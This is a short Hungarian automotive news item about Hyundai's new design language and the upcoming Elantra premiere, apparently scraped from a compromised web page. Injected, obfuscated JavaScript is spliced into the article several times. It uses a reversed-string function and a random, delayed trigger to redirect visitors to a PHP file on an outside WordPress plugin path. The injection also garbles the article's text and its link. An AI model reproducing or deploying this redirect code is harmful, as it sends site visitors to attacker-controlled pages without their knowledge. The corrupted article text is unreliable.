Újabb dizájnfilozófiát vezet be a Hyundai: ha jól értelmezzük, a „parametrikus dinamika” lényege a több síkból felépülő felületek. Ez az első oldalajtón nyilvánul meg a legerőteljesebben, ahol három törésvonal találkozik, az autóiparban szokatlan formai hatást keltve. Az utastérben a vezető köré simuló környezet, valamint két, integrált digitális kijelzőfelület tárul az utasok elé. Ennél többet egyelőre nem árul az „elődjénél hosszabb, szélesebb és alacsonyabb autóról” a gyár: a tényeket alighanem a március 17-i világpremierre tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}togatják.
A cikk folytatódik: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2020/03/16/hyundai-elantra.html" target="_blank">http://autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2020/03/16/hyundai-elantra.html
- Hirdetés -